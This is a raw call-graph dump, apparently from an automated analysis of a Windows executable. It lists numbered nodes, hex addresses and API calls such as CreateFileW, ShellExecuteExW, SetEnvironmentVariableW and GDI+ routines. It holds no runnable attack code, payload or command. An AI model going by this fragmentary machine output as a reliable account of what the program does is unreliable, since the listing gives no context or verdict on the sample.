___delayLoadHelper2@8 14 API calls 26537->26538 26539 db10bf 26538->26539 26544 dbe6a1 31 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 26569 dab4a0 ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24509 d9b45f 24516 d9b469 24509->24516 24510 d9b48d 24511 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 24510->24511 24513 d9b50b 24511->24513 24512 d9b5b6 24514 d9b5dd SetFilePointer 24512->24514 24514->24510 24515 d9b5fa GetLastError 24514->24515 24515->24510 24516->24510 24516->24512 24516->24514 24518 d9b1e6 24516->24518 24519 d9b1ff 24518->24519 24522 d9b8c0 24519->24522 24523 d9b8d2 24522->24523 24526 d9b8e5 24522->24526 24527 d9b231 24523->24527 24531 d97cd8 77 API calls 24523->24531 24524 d9b8f8 SetFilePointer 24524->24527 24528 d9b914 GetLastError 24524->24528 24526->24524 24526->24527 24527->24512 24528->24527 24529 d9b91e 24528->24529 24529->24527 24532 d97cd8 77 API calls 24529->24532 24531->24526 24532->24527 24533 daf05c 24540 daf07f 24533->24540 24534 dad5dd 6 API calls 24536 daea83 _wcslen _wcsrchr 24534->24536 24536->24534 24537 daf717 24536->24537 24541 daed57 SetWindowTextW 24536->24541 24543 d9dd18 5 API calls 24536->24543 24545 db66ae 22 API calls 24536->24545 24547 daeb4b SetFileAttributesW 24536->24547 24552 dad41c 100 API calls 24536->24552 24555 daf73c 24536->24555 24560 daef75 SendMessageW 24536->24560 24585 dac5dd GetCurrentDirectoryW 24536->24585 24587 d9c3de 11 API calls 24536->24587 24588 d9c367 FindClose 24536->24588 24589 dad76e 76 API calls 3 library calls 24536->24589 24538 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 24537->24538 24539 daf732 24538->24539 24540->24536 24564 dafafc 24540->24564 24541->24536 24543->24536 24545->24536 24548 daec05 GetFileAttributesW 24547->24548 24563 daeb65 __cftof _wcslen 24547->24563 24548->24536 24551 daec17 DeleteFileW 24548->24551 24551->24536 24553 daec28 24551->24553 24554 daef35 GetDlgItem SetWindowTextW SendMessageW 24552->24554 24558 d94c00 _swprintf 51 API calls 24553->24558 24554->24536 24590 db13f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 24555->24590 24557 daf741 24559 daec48 GetFileAttributesW 24558->24559 24559->24553 24561 daec5d MoveFileW 24559->24561 24560->24536 24561->24536 24562 daec75 MoveFileExW 24561->24562 24562->24536 24563->24536 24563->24548 24586 d9d8ac 51 API calls 2 library calls 24563->24586 24568 dafb06 __cftof _wcslen 24564->24568 24565 dafd7e 24566 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 24565->24566 24567 dafd8f 24566->24567 24567->24536 24568->24565 24591 d9bccb 24568->24591 24571 dafc73 ShellExecuteExW 24571->24565 24577 dafc86 24571->24577 24573 dafc6b 24573->24571 24574 dafcb8 24595 db004d 6 API calls 24574->24595 24575 dafd0e CloseHandle 24576 dafd1c 24575->24576 24576->24565 24581 dafd75 ShowWindow 24576->24581 24577->24574 24577->24575 24578 dafcae ShowWindow 24577->24578 24578->24574 24580 dafcd0 24580->24575 24582 dafce3 GetExitCodeProcess 24580->24582 24581->24565 24582->24575 24583 dafcf6 24582->24583 24583->24575 24585->24536 24586->24563 24587->24536 24588->24536 24589->24536 24590->24557 24596 d9bcdd 24591->24596 24594 d9d563 8 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 24594->24573 24595->24580 24606 db1590 24596->24606 24599 d9bd2c 24602 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 24599->24602 24600 d9bd07 24608 d9da1e 24600->24608 24603 d9bcd4 24602->24603 24603->24571 24603->24594 24605 d9bd1d GetFileAttributesW 24605->24599 24607 d9bcea GetFileAttributesW 24606->24607 24607->24599 24607->24600 24611 d9da28 _wcslen 24608->24611 24609 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 24610 d9bd19 24609->24610 24610->24599 24610->24605 24612 d9daf7 GetCurrentDirectoryW 24611->24612 24613 d9da6f _wcslen 24611->24613 24612->24613 24613->24609 26571 dc1850 51 API calls 26573 db239f 9 API calls 2 library calls 25247 dbd240 25249 dbd24b 25247->25249 25248 dbd55a 11 API calls 25248->25249 25249->25248 25250 dbd274 25249->25250 25251 dbd270 25249->25251 25253 dbd2a0 DeleteCriticalSection 25250->25253 25253->25251 25254 db0a46 25255 db09f4 25254->25255 25257 db0d3a 25255->25257 25283 db0a98 25257->25283 25259 db0d4a 25260 db0dcb 25259->25260 25261 db0da7 25259->25261 25264 db0e43 LoadLibraryExA 25260->25264 25266 db0ea4 25260->25266 25269 db0eb6 25260->25269 25271 db0f72 25260->25271 25262 db0cd8 DloadReleaseSectionWriteAccess 6 API calls 25261->25262 25263 db0db2 RaiseException 25262->25263 25278 db0fa0 25263->25278 25265 db0e56 GetLastError 25264->25265 25264->25266 25270 db0e7f 25265->25270 25274 db0e69 25265->25274 25268 db0eaf FreeLibrary 25266->25268 25266->25269 25267 db0f14 GetProcAddress 25267->25271 25273 db0f24 GetLastError 25267->25273 25268->25269 25269->25267 25269->25271 25272 db0cd8 DloadReleaseSectionWriteAccess 6 API calls 25270->25272 25292 db0cd8 25271->25292 25275 db0e8a RaiseException 25272->25275 25276 db0f37 25273->25276 25274->25266 25274->25270 25275->25278 25276->25271 25279 db0cd8 DloadReleaseSectionWriteAccess 6 API calls 25276->25279 25278->25255 25280 db0f58 RaiseException 25279->25280 25281 db0a98 ___delayLoadHelper2@8 6 API calls 25280->25281 25282 db0f6f 25281->25282 25282->25271 25284 db0aca 25283->25284 25285 db0aa4 25283->25285 25284->25259 25300 db0b41 25285->25300 25287 db0aa9 25288 db0ac5 25287->25288 25303 db0c6a 25287->25303 25308 db0acb GetModuleHandleW GetProcAddress GetProcAddress 25288->25308 25291 db0d13 25291->25259 25293 db0cea 25292->25293 25294 db0d0c 25292->25294 25295 db0b41 DloadReleaseSectionWriteAccess 3 API calls 25293->25295 25294->25278 25296 db0cef 25295->25296 25297 db0d07 25296->25297 25298 db0c6a DloadProtectSection 3 API calls 25296->25298 25311 db0d0e GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 25297->25311 25298->25297 25309 db0acb GetModuleHandleW GetProcAddress GetProcAddress 25300->25309 25302 db0b46 25302->25287 25306 db0c7f DloadProtectSection 25303->25306 25304 db0c85 25304->25288 25305 db0cba VirtualProtect 25305->25304 25306->25304 25306->25305 25310 db0b80 VirtualQuery GetSystemInfo 25306->25310 25308->25291 25309->25302 25310->25305 25311->25294 25318 db067c 14 API calls ___delayLoadHelper2@8 26577 db8870 QueryPerformanceFrequency QueryPerformanceCounter 25322 d91075 25327 da11a5 25322->25327 25324 d9107a 25331 db1932 29 API calls 25324->25331 25326 d91084 25328 da11b1 __EH_prolog3 25327->25328 25332 d94a2c 41 API calls 25328->25332 25330 da11ca 25330->25324 25331->25326 25332->25330 26642 dc1a71 21 API calls __vsnwprintf_l 26645 db2610 RaiseException std::_Xinvalid_argument _com_error::_com_error 26583 dac000 28 API calls 26584 d94c20 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26650 d92620 97 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 26651 dbca20 21 API calls 2 library calls 26586 d91025 29 API calls 24616 db1bd2 24617 db1bde ___scrt_is_nonwritable_in_current_image 24616->24617 24648 db176c 24617->24648 24619 db1be5 24620 db1d38 24619->24620 24623 db1c0f 24619->24623 24727 db1fca 4 API calls 2 library calls 24620->24727 24622 db1d3f 24720 dba7aa 24622->24720 24635 db1c4e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24623->24635 24659 dbb34d 24623->24659 24630 db1c2e 24632 db1caf 24667 db20e5 GetStartupInfoW __cftof 24632->24667 24634 db1cb5 24668 dbb29e 51 API calls 24634->24668 24635->24632 24723 dba29c 38 API calls 3 library calls 24635->24723 24638 db1cbd 24669 db037c 24638->24669 24642 db1cd1 24642->24622 24643 db1cd5 24642->24643 24644 db1cde 24643->24644 24725 dba74d 28 API calls _abort 24643->24725 24726 db18dd 12 API calls ___scrt_uninitialize_crt 24644->24726 24647 db1ce6 24647->24630 24649 db1775 24648->24649 24729 db1de6 IsProcessorFeaturePresent 24649->24729 24651 db1781 24730 db507e 24651->24730 24653 db1786 24654 db178a 24653->24654 24738 dbb1d7 24653->24738 24654->24619 24657 db17a1 24657->24619 24662 dbb364 24659->24662 24660 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 24661 db1c28 24660->24661 24661->24630 24663 dbb2f1 24661->24663 24662->24660 24664 dbb320 24663->24664 24665 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 24664->24665 24666 dbb349 24665->24666 24666->24635 24667->24634 24668->24638 24850 da290a 24669->24850 24673 db03aa 24906 daccd9 24673->24906 24675 db03b3 __cftof 24676 db03c6 GetCommandLineW 24675->24676 24677 db046a GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24676->24677 24678 db03d9 24676->24678 24679 d94c00 _swprintf 51 API calls 24677->24679 24910 dae872 24678->24910 24682 db04e6 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24679->24682 24925 dad9dd LoadBitmapW 24682->24925 24683 db03e7 OpenFileMappingW 24687 db045b CloseHandle 24683->24687 24688 db03ff MapViewOfFile 24683->24688 24684 db0464 24917 daffdd 24684->24917 24687->24677 24690 db0410 __InternalCxxFrameHandler 24688->24690 24691 db0454 UnmapViewOfFile 24688->24691 24695 daffdd 7 API calls 24690->24695 24691->24687 24697 db042c 24695->24697 24955 da136b 82 API calls 24697->24955 24698 daafe6 27 API calls 24700 db0546 DialogBoxParamW 24698->24700 24704 db0580 24700->24704 24701 db0440 24956 da1421 82 API calls _wcslen 24701->24956 24703 db044b 24703->24691 24705 db0599 24704->24705 24706 db0592 Sleep 24704->24706 24708 db05a7 24705->24708 24957 dacf89 7 API calls 3 library calls 24705->24957 24706->24705 24709 db05c6 DeleteObject 24708->24709 24710 db05db DeleteObject 24709->24710 24711 db05e2 24709->24711 24710->24711 24712 db0613 24711->24712 24713 db0625 24711->24713 24958 db004d 6 API calls 24712->24958 24952 dacd3f 24713->24952 24715 db0619 CloseHandle 24715->24713 24717 db065f 24718 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 24717->24718 24719 db0673 24718->24719 24724 db211b GetModuleHandleW 24719->24724 25189 dba527 24720->25189 24723->24632 24724->24642 24725->24644 24726->24647 24727->24622 24729->24651 24742 db6127 24730->24742 24733 db5087 24733->24653 24735 db508f 24736 db509a 24735->24736 24756 db6163 DeleteCriticalSection 24735->24756 24736->24653 24783 dbe6aa 24738->24783 24741 db509d 7 API calls 2 library calls 24741->24654 24743 db6130 24742->24743 24745 db6159 24743->24745 24746 db5083 24743->24746 24757 db636c 24743->24757 24762 db6163 DeleteCriticalSection 24745->24762 24746->24733 24748 db51ac 24746->24748 24776 db627d 24748->24776 24751 db51c1 24751->24735 24753 db51cf 24754 db51dc 24753->24754 24782 db51df 6 API calls ___vcrt_FlsFree 24753->24782 24754->24735 24756->24733 24763 db6192 24757->24763 24760 db63a4 InitializeCriticalSectionAndSpinCount 24761 db638f 24760->24761 24761->24743 24762->24746 24764 db61af 24763->24764 24768 db61b3 24763->24768 24764->24760 24764->24761 24765 db621b GetProcAddress 24765->24764 24767 db6229 24765->24767 24767->24764 24768->24764 24768->24765 24769 db620c 24768->24769 24771 db6232 LoadLibraryExW 24768->24771 24769->24765 24770 db6214 FreeLibrary 24769->24770 24770->24765 24772 db6279 24771->24772 24773 db6249 GetLastError 24771->24773 24772->24768 24773->24772 24774 db6254 ___vcrt_FlsSetValue 24773->24774 24774->24772 24775 db626a LoadLibraryExW 24774->24775 24775->24768 24777 db6192 ___vcrt_FlsSetValue 5 API calls 24776->24777 24778 db6297 24777->24778 24779 db62b0 TlsAlloc 24778->24779 24780 db51b6 24778->24780 24780->24751 24781 db632e 6 API calls ___vcrt_FlsSetValue 24780->24781 24781->24753 24782->24751 24786 dbe6c7 24783->24786 24787 dbe6c3 24783->24787 24784 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 24785 db1793 24784->24785 24785->24657 24785->24741 24786->24787 24789 dbccf0 24786->24789 24787->24784 24790 dbccfc ___scrt_is_nonwritable_in_current_image 24789->24790 24801 dbd281 EnterCriticalSection 24790->24801 24792 dbcd03 24802 dbeb78 24792->24802 24794 dbcd12 24800 dbcd21 24794->24800 24815 dbcb79 29 API calls 24794->24815 24797 dbcd32 _abort 24797->24786 24798 dbcd1c 24816 dbcc2f GetStdHandle GetFileType 24798->24816 24817 dbcd3d LeaveCriticalSection _abort 24800->24817 24801->24792 24803 dbeb84 ___scrt_is_nonwritable_in_current_image 24802->24803 24804 dbeba8 24803->24804 24805 dbeb91 24803->24805 24818 dbd281 EnterCriticalSection 24804->24818 24826 dbbc7b 20 API calls __dosmaperr 24805->24826 24808 dbeb96 24827 db6649 26 API calls ___std_exception_copy 24808->24827 24810 dbebe0 24828 dbec07 LeaveCriticalSection _abort 24810->24828 24811 dbeba0 _abort 24811->24794 24812 dbebb4 24812->24810 24819 dbeac9 24812->24819 24815->24798 24816->24800 24817->24797 24818->24812 24820 dbd786 __dosmaperr 20 API calls 24819->24820 24821 dbeadb 24820->24821 24825 dbeae8 24821->24825 24829 dbd55a 24821->24829 24822 dbbafa _free 20 API calls 24824 dbeb3a 24822->24824 24824->24812 24825->24822 24826->24808 24827->24811 24828->24811 24836 dbd2e8 24829->24836 24832 dbd58a 24834 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 24832->24834 24833 dbd59f InitializeCriticalSectionAndSpinCount 24833->24832 24835 dbd5b6 24834->24835 24835->24821 24837 dbd318 24836->24837 24841 dbd314 24836->24841 24837->24832 24837->24833 24838 dbd338 24838->24837 24840 dbd344 GetProcAddress 24838->24840 24842 dbd354 __dosmaperr 24840->24842 24841->24837 24841->24838 24843 dbd384 24841->24843 24842->24837 24844 dbd39a 24843->24844 24845 dbd3a5 LoadLibraryExW 24843->24845 24844->24841 24846 dbd3c2 GetLastError 24845->24846 24847 dbd3da 24845->24847 24846->24847 24848 dbd3cd LoadLibraryExW 24846->24848 24847->24844 24849 dbd3f1 FreeLibrary 24847->24849 24848->24847 24849->24844 24851 db1590 24850->24851 24852 da2914 GetModuleHandleW 24851->24852 24853 da2999 24852->24853 24854 da2943 GetProcAddress 24852->24854 24855 da2cda 24853->24855 24973 db9e7e 42 API calls __vsnwprintf_l 24853->24973 24856 da296d GetProcAddress 24854->24856 24857 da2955 24854->24857 24859 da2cdc GetModuleFileNameW 24855->24859 24856->24853 24858 da297f 24856->24858 24857->24856 24858->24853 24874 da2cfa 24859->24874 24861 da2c06 24861->24859 24862 da2c13 GetModuleFileNameW CreateFileW 24861->24862 24863 da2ccc CloseHandle 24862->24863 24864 da2c47 SetFilePointer 24862->24864 24863->24859 24864->24863 24865 da2c55 ReadFile 24864->24865 24865->24863 24866 da2c73 24865->24866 24868 da2ede 24866->24868 24871 da2c85 24866->24871 24980 db13f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 24868->24980 24870 da2ee3 24871->24863 24876 da28ab 7 API calls 24871->24876 24873 da2d5c GetFileAttributesW 24873->24874 24875 da2d74 24873->24875 24874->24873 24874->24875 24959 d9d076 24874->24959 24964 da28ab 24874->24964 24877 da2d7f 24875->24877 24878 da2db4 24875->24878 24876->24871 24883 da2d98 GetFileAttributesW 24877->24883 24885 da2db0 24877->24885 24879 da2dbc 24878->24879 24880 da2ec3 24878->24880 24884 d9d076 6 API calls 24879->24884 24881 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 24880->24881 24882 da2ed5 24881->24882 24905 dac5dd GetCurrentDirectoryW 24882->24905 24883->24877 24883->24885 24886 da2dce 24884->24886 24885->24878 24887 da2e3b 24886->24887 24888 da2dd5 24886->24888 24889 d94c00 _swprintf 51 API calls 24887->24889 24890 da28ab 7 API calls 24888->24890 24891 da2e63 AllocConsole 24889->24891 24892 da2ddf 24890->24892 24893 da2ebb ExitProcess 24891->24893 24894 da2e70 GetCurrentProcessId AttachConsole 24891->24894 24895 da28ab 7 API calls 24892->24895 24978 db6433 24894->24978 24897 da2de9 24895->24897 24974 da0597 24897->24974 24898 da2e91 GetStdHandle WriteConsoleW Sleep FreeConsole 24898->24893 24901 d94c00 _swprintf 51 API calls 24902 da2e17 24901->24902 24903 da0597 53 API calls 24902->24903 24904 da2e26 24903->24904 24904->24893 24905->24673 24907 da28ab 7 API calls 24906->24907 24908 dacced OleInitialize 24907->24908 24909 dacd10 GdiplusStartup SHGetMalloc 24908->24909 24909->24675 24916 dae87c 24910->24916 24911 dae9a0 24912 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 24911->24912 24913 dae9b1 24912->24913 24913->24683 24913->24684 24914 da4159 CharUpperW 24914->24916 24916->24911 24916->24914 25008 da1421 82 API calls _wcslen 24916->25008 24918 db1590 24917->24918 24919 daffea SetEnvironmentVariableW 24918->24919 24920 db0016 24919->24920 24921 db003e 24920->24921 24924 db0032 SetEnvironmentVariableW 24920->24924 24922 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 24921->24922 24923 db0049 24922->24923 24923->24677 24924->24921 24926 dada0b GetObjectW 24925->24926 24927 dad9fe 24925->24927 24929 dada1a 24926->24929 25014 dac652 FindResourceW 24927->25014 25009 dac556 24929->25009 24933 dada70 24944 d9f93e 24933->24944 24934 dada4c 25028 dac595 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24934->25028 24935 dac652 12 API calls 24937 dada3d 24935->24937 24937->24934 24939 dada43 DeleteObject 24937->24939 24938 dada54 25029 dac574 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24938->25029 24939->24934 24941 dada5d 25030 dac79c 13 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 24941->25030 24943 dada64 DeleteObject 24943->24933 25041 d9f963 24944->25041 24949 daafe6 25172 db121c 24949->25172 24951 dab005 24951->24698 24953 dacd78 GdiplusShutdown OleUninitialize 24952->24953 24953->24717 24955->24701 24956->24703 24957->24708 24958->24715 24960 d9d09c GetVersionExW 24959->24960 24961 d9d0c9 24959->24961 24960->24961 24962 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 24961->24962 24963 d9d0f2 24962->24963 24963->24874 24965 db1590 24964->24965 24966 da28b8 GetSystemDirectoryW 24965->24966 24967 da28fa 24966->24967 24968 da28de 24966->24968 24969 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 24967->24969 24970 d9dd18 5 API calls 24968->24970 24972 da2906 24969->24972 24971 da28ed LoadLibraryW 24970->24971 24971->24967 24972->24874 24973->24861 24975 da05a7 24974->24975 24981 da05c8 24975->24981 24979 db643b 24978->24979 24979->24898 24979->24979 24980->24870 24987 d9f892 24981->24987 24984 da05eb LoadStringW 24985 da05c5 24984->24985 24986 da0602 LoadStringW 24984->24986 24985->24901 24986->24985 24994 d9f7b8 24987->24994 24990 d9f8d3 24992 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 24990->24992 24993 d9f8e8 24992->24993 24993->24984 24993->24985 24995 d9f7e1 24994->24995 25003 d9f85d _strncpy 24994->25003 25000 d9f801 24995->25000 25005 da3f47 WideCharToMultiByte 24995->25005 24997 d9f832 25007 db8a01 26 API calls 3 library calls 24997->25007 24998 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 24999 d9f88b 24998->24999 24999->24990 25004 d9f8ec 26 API calls 24999->25004 25000->24997 25006 da0531 50 API calls __vsnprintf 25000->25006 25003->24998 25004->24990 25005->25000 25006->24997 25007->25003 25008->24916 25031 dac574 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25009->25031 25011 dac55d 25013 dac569 25011->25013 25032 dac595 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25011->25032 25013->24933 25013->24934 25013->24935 25015 dac763 25014->25015 25016 dac675 SizeofResource 25014->25016 25015->24926 25015->24929 25016->25015 25017 dac68c LoadResource 25016->25017 25017->25015 25018 dac6a1 LockResource 25017->25018 25018->25015 25019 dac6b2 GlobalAlloc 25018->25019 25019->25015 25020 dac6cd GlobalLock 25019->25020 25021 dac75c GlobalFree 25020->25021 25022 dac6dc __InternalCxxFrameHandler 25020->25022 25021->25015 25023 dac755 GlobalUnlock 25022->25023 25033 dac5b6 GdipAlloc 25022->25033 25023->25021 25026 dac72a GdipCreateHBITMAPFromBitmap 25027 dac740 25026->25027 25027->25023 25028->24938 25029->24941 25030->24943 25031->25011 25032->25013 25034 dac5c8 25033->25034 25035 dac5d5 25033->25035 25037 dac34d 25034->25037 25035->25023 25035->25026 25035->25027 25038 dac36e GdipCreateBitmapFromStreamICM 25037->25038 25039 dac375 GdipCreateBitmapFromStream 25037->25039 25040 dac37a 25038->25040 25039->25040 25040->25035 25042 d9f975 25041->25042 25043 d9f9cb GetModuleFileNameW 25042->25043 25044 d9f9f8 25042->25044 25045 d9f9df 25043->25045 25095 d9b2b0 25044->25095 25045->25044 25047 d9fa47 25108 db8bc0 25047->25108 25050 da01bd 78 API calls 25054 d9fa1b 25050->25054 25052 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 25055 d9f94a 25052->25055 25053 d9fa5a 25056 db8bc0 26 API calls 25053->25056 25054->25047 25054->25050 25067 d9fc4f 25054->25067 25093 da01fa GetModuleHandleW FindResourceW 25055->25093 25064 d9fa6c ___vcrt_FlsSetValue 25056->25064 25057 d9fb92 25057->25067 25135 d9b7b0 81 API calls 25057->25135 25059 d9b8c0 79 API calls 25059->25064 25061 d9fba9 ___std_exception_copy 25062 d9b610 82 API calls 25061->25062 25061->25067 25065 d9fbcf ___std_exception_copy 25062->25065 25064->25057 25064->25059 25064->25067 25129 d9b610 25064->25129 25134 d9b7b0 81 API calls 25064->25134 25065->25067 25076 d9fbda ___vcrt_FlsSetValue _wcslen ___std_exception_copy 25065->25076 25136 da3d10 MultiByteToWideChar 25065->25136 25122 d9af2f 25067->25122 25068 d9fd76 25074 da0126 25068->25074 25142 dbb52e 26 API calls 2 library calls 25068->25142 25070 d9ffed 25070->25068 25139 dbb52e 26 API calls 2 library calls 25070->25139 25071 da00b6 25143 db9ea8 26 API calls 2 library calls 25071->25143 25073 da015c 25079 db8bc0 26 API calls 25073->25079 25074->25073 25078 da01bd 78 API calls 25074->25078 25076->25067 25076->25068 25076->25070 25087 da01b7 25076->25087 25089 da3f47 WideCharToMultiByte 25076->25089 25137 da0531 50 API calls __vsnprintf 25076->25137 25138 db8a01 26 API calls 3 library calls 25076->25138 25077 da010e 25144 da01d8 78 API calls 25077->25144 25078->25074 25081 da0175 25079->25081 25083 db8bc0 26 API calls 25081->25083 25082 da000c 25140 db9ea8 26 API calls 2 library calls 25082->25140 25083->25067 25085 da0064 25141 da01d8 78 API calls 25085->25141 25145 db13f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25087->25145 25089->25076 25090 da01bc 25094 d9f951 25093->25094 25094->24949 25096 d9b2ba 25095->25096 25097 d9b334 CreateFileW 25096->25097 25098 d9b34f GetLastError 25097->25098 25101 d9b39b 25097->25101 25099 d9da1e 6 API calls 25098->25099 25100 d9b36c 25099->25100 25100->25101 25103 d9b370 CreateFileW GetLastError 25100->25103 25102 d9b3df 25101->25102 25104 d9b3c5 SetFileTime 25101->25104 25106 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 25102->25106 25103->25101 25105 d9b395 25103->25105 25104->25102 25105->25101 25107 d9b41e 25106->25107 25107->25054 25109 db8bf9 25108->25109 25110 db8bfd 25109->25110 25121 db8c25 25109->25121 25146 dbbc7b 20 API calls __dosmaperr 25110->25146 25112 db8c02 25147 db6649 26 API calls ___std_exception_copy 25112->25147 25114 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 25116 db8f56 25114->25116 25115 db8c0d 25117 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 25115->25117 25116->25053 25118 db8c19 25117->25118 25118->25053 25120 db8f49 25120->25114 25121->25120 25148 db8ae0 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 25121->25148 25123 d9af5d 25122->25123 25124 d9af6e 25122->25124 25123->25124 25125 d9af69 25123->25125 25126 d9af70 25123->25126 25124->25052 25149 d9b11a 25125->25149 25154 d9afd0 25126->25154 25130 d9b61c 25129->25130 25132 d9b623 25129->25132 25130->25064 25132->25130 25133 d9b151 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25132->25133 25171 d97c95 77 API calls 25132->25171 25133->25132 25134->25064 25135->25061 25136->25076 25137->25076 25138->25076 25139->25082 25140->25085 25141->25068 25142->25071 25143->25077 25144->25074 25145->25090 25146->25112 25147->25115 25148->25121 25150 d9b14d 25149->25150 25151 d9b123 25149->25151 25150->25124 25151->25150 25160 d9bc65 25151->25160 25155 d9afdc 25154->25155 25156 d9affa 25154->25156 25155->25156 25158 d9afe8 FindCloseChangeNotification 25155->25158 25157 d9b019 25156->25157 25170 d97b49 76 API calls 25156->25170 25157->25124 25158->25156 25161 db1590 25160->25161 25162 d9bc72 DeleteFileW 25161->25162 25163 d9bcb9 25162->25163 25164 d9bc91 25162->25164 25166 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 25163->25166 25165 d9da1e 6 API calls 25164->25165 25167 d9bca3 25165->25167 25168 d9b14b 25166->25168 25167->25163 25169 d9bca7 DeleteFileW 25167->25169 25168->25124 25169->25163 25170->25157 25171->25132 25174 db1221 ___std_exception_copy 25172->25174 25173 db123b 25173->24951 25174->25173 25176 db123d 25174->25176 25187 dba2ec 7 API calls 2 library calls 25174->25187 25177 d94adb Concurrency::cancel_current_task 25176->25177 25179 db1247 25176->25179 25185 db47d0 RaiseException 25177->25185 25188 db47d0 RaiseException 25179->25188 25180 d94af7 25184 d94b0d 25180->25184 25186 d913db 26 API calls Concurrency::cancel_current_task 25180->25186 25182 db1de0 25184->24951 25185->25180 25186->25184 25187->25174 25188->25182 25190 dba533 _unexpected 25189->25190 25191 dba53a 25190->25191 25192 dba54c 25190->25192 25225 dba681 GetModuleHandleW 25191->25225 25213 dbd281 EnterCriticalSection 25192->25213 25195 dba53f 25195->25192 25226 dba6c5 GetModuleHandleExW 25195->25226 25196 dba5f1 25214 dba631 25196->25214 25201 dba5c8 25203 dba5e0 25201->25203 25208 dbb2f1 _abort 5 API calls 25201->25208 25202 dba553 25202->25196 25202->25201 25234 dbb040 20 API calls _abort 25202->25234 25209 dbb2f1 _abort 5 API calls 25203->25209 25204 dba63a 25235 dc49b0 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 25204->25235 25205 dba60e 25217 dba640 25205->25217 25208->25203 25209->25196 25213->25202 25236 dbd2d1 LeaveCriticalSection 25214->25236 25216 dba60a 25216->25204 25216->25205 25237 dbd6c6 25217->25237 25220 dba66e 25223 dba6c5 _abort 8 API calls 25220->25223 25221 dba64e GetPEB 25221->25220 25222 dba65e GetCurrentProcess TerminateProcess 25221->25222 25222->25220 25224 dba676 ExitProcess 25223->25224 25225->25195 25227 dba6ef GetProcAddress 25226->25227 25228 dba712 25226->25228 25233 dba704 25227->25233 25229 dba718 FreeLibrary 25228->25229 25230 dba721 25228->25230 25229->25230 25231 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 25230->25231 25232 dba54b 25231->25232 25232->25192 25233->25228 25234->25201 25236->25216 25238 dbd6eb 25237->25238 25239 dbd6e1 25237->25239 25240 dbd2e8 __dosmaperr 5 API calls 25238->25240 25241 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 25239->25241 25240->25239 25242 dba64a 25241->25242 25242->25220 25242->25221 26653 dab3d0 6 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 26654 dac3d0 GdipCloneImage GdipAlloc 26657 dba7c0 52 API calls 3 library calls 26658 db1bc0 27 API calls 26589 dc55c0 VariantClear 26590 da11eb FreeLibrary 26592 db29e0 51 API calls 2 library calls 26664 d9af90 80 API calls Concurrency::cancel_current_task 26665 dac390 GdipDisposeImage GdipFree 26593 dc4590 CloseHandle 26667 daea83 121 API calls 5 library calls 26355 db0782 26356 db0686 26355->26356 26357 db0d3a ___delayLoadHelper2@8 14 API calls 26356->26357 26357->26356 26358 dbe180 26359 dbe192 26358->26359 26360 dbe189 26358->26360 26362 dbe077 26360->26362 26363 dbb9a5 _unexpected 38 API calls 26362->26363 26364 dbe084 26363->26364 26382 dbe19e 26364->26382 26366 dbe08c 26391 dbde0b 26366->26391 26369 dbbc8e __vsnwprintf_l 21 API calls 26370 dbe0b4 